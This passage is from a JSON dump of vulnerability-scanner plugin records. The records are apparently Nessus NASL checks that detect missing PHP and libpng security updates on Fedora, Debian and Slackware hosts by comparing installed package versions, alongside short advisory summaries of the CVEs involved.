pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"libpng\", pkgver:\"1.4.8\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:09:29", "description": "Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Enforce security in the fastcgi protocol parsing with\n fpm SAPI.\n\n - Fixed bug #54247 (format-string vulnerability on\n Phar). (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-03-27T00:00:00", "title": "Fedora 15 : maniadrive-1.2-29.fc15 / php-5.3.6-1.fc15 / php-eaccelerator-0.9.6.1-6.fc15 (2011-3614)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "modified": "2011-03-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-3614.NASL", "href": "https://www.tenable.com/plugins/nessus/52983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-3614.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52983);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-1153\");\n script_bugtraq_id(46354, 46365, 46854);\n script_xref(name:\"FEDORA\", value:\"2011-3614\");\n\n script_name(english:\"Fedora 15 : maniadrive-1.2-29.fc15 / php-5.3.6-1.fc15 / php-eaccelerator-0.9.6.1-6.fc15 (2011-3614)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Enforce security in the fastcgi protocol parsing with\n fpm SAPI.\n\n - Fixed bug #54247 (format-string vulnerability on\n Phar). (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.3.6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=680972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688735\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-March/056640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?db15ff24\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-March/056641.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef8fca1a\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-March/056642.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c1094c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"maniadrive-1.2-29.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-5.3.6-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-eaccelerator-0.9.6.1-6.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:29", "description": "Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Fixed bug #54247 (format-string vulnerability on Phar).\n (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-04-07T00:00:00", "title": "Fedora 14 : maniadrive-1.2-27.fc14 / php-5.3.6-1.fc14 / php-eaccelerator-0.9.6.1-6.fc14 (2011-3636)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "modified": "2011-04-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-3636.NASL", "href": "https://www.tenable.com/plugins/nessus/53305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-3636.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53305);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-1153\");\n script_xref(name:\"FEDORA\", value:\"2011-3636\");\n\n script_name(english:\"Fedora 14 : maniadrive-1.2-27.fc14 / php-5.3.6-1.fc14 / php-eaccelerator-0.9.6.1-6.fc14 (2011-3636)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Fixed bug #54247 (format-string vulnerability on Phar).\n (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.3.6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=680972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688735\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057707.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42215151\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057708.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f44cb64e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057709.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f1b9a8f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"maniadrive-1.2-27.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"php-5.3.6-1.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"php-eaccelerator-0.9.6.1-6.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:29", "description": "Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Fixed bug #54247 (format-string vulnerability on Phar).\n (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2011-04-07T00:00:00", "title": "Fedora 13 : maniadrive-1.2-27.fc13 / php-5.3.6-1.fc13 / php-eaccelerator-0.9.6.1-6.fc13 (2011-3666)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1092", "CVE-2011-0708"], "modified": "2011-04-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-3666.NASL", "href": "https://www.tenable.com/plugins/nessus/53306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-3666.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53306);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-1153\");\n script_xref(name:\"FEDORA\", value:\"2011-3666\");\n\n script_name(english:\"Fedora 13 : maniadrive-1.2-27.fc13 / php-5.3.6-1.fc13 / php-eaccelerator-0.9.6.1-6.fc13 (2011-3666)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes in PHP 5.3.6 :\n\n - Fixed bug #54247 (format-string vulnerability on Phar).\n (CVE-2011-1153)\n\n - Fixed bug #54193 (Integer overflow in shmop_read()).\n (CVE-2011-1092)\n\n - Fixed bug #54055 (buffer overrun with high values for\n precision ini setting).\n\n - Fixed bug #54002 (crash on crafted tag in exif).\n (CVE-2011-0708)\n\n - Fixed bug #53885 (ZipArchive segfault with\n FL_UNCHANGED on empty archive). (CVE-2011-0421)\n\nFull upstream changelog : http://php.net/ChangeLog-5.php#5.3.6\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.3.6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=680972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688735\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057710.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dbf2d8c0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057711.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9b6fcaf\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/057712.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bc4aa699\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"maniadrive-1.2-27.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"php-5.3.6-1.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"php-eaccelerator-0.9.6.1-6.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:46:36", "description": "Several vulnerabilities were discovered in PHP, which could lead to\ndenial of service or potentially the execution of arbitrary code.\n\n - CVE-2010-2531\n An information leak was found in the var_export()\n function.\n\n - CVE-2011-0421\n The Zip module could crash.\n\n - CVE-2011-0708\n An integer overflow was discovered in the Exif module.\n\n - CVE-2011-1466\n An integer overflow was discovered in the Calendar\n module.\n\n - CVE-2011-1471\n The Zip module was prone to denial of service through\n malformed archives.\n\n - CVE-2011-2202\n Path names in form based file uploads (RFC 1867) were\n incorrectly validated.\n\nThis update also fixes two bugs, which are not treated as security\nissues, but fixed nonetheless, see README.Debian.security for details\non the scope of security support for PHP (CVE-2011-0420, CVE-2011-1153\n).", "edition": 16, "published": "2011-07-05T00:00:00", "title": "Debian DSA-2266-1 : php5 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-0708", "CVE-2011-0420", "CVE-2011-2202"], "modified": "2011-07-05T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:php5"], "id": "DEBIAN_DSA-2266.NASL", "href": "https://www.tenable.com/plugins/nessus/55486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2266. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55486);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-2531\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-1153\", \"CVE-2011-1466\", \"CVE-2011-1471\", \"CVE-2011-2202\");\n script_bugtraq_id(46975, 48259);\n script_xref(name:\"DSA\", value:\"2266\");\n\n script_name(english:\"Debian DSA-2266-1 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in PHP, which could lead to\ndenial of service or potentially the execution of arbitrary code.\n\n - CVE-2010-2531\n An information leak was found in the var_export()\n function.\n\n - CVE-2011-0421\n The Zip module could crash.\n\n - CVE-2011-0708\n An integer overflow was discovered in the Exif module.\n\n - CVE-2011-1466\n An integer overflow was discovered in the Calendar\n module.\n\n - CVE-2011-1471\n The Zip module was prone to denial of service through\n malformed archives.\n\n - CVE-2011-2202\n Path names in form based file uploads (RFC 1867) were\n incorrectly validated.\n\nThis update also fixes two bugs, which are not treated as security\nissues, but fixed nonetheless, see README.Debian.security for details\non the scope of security support for PHP (CVE-2011-0420, CVE-2011-1153\n).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-2531\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-1466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-1471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-1153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2266\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n 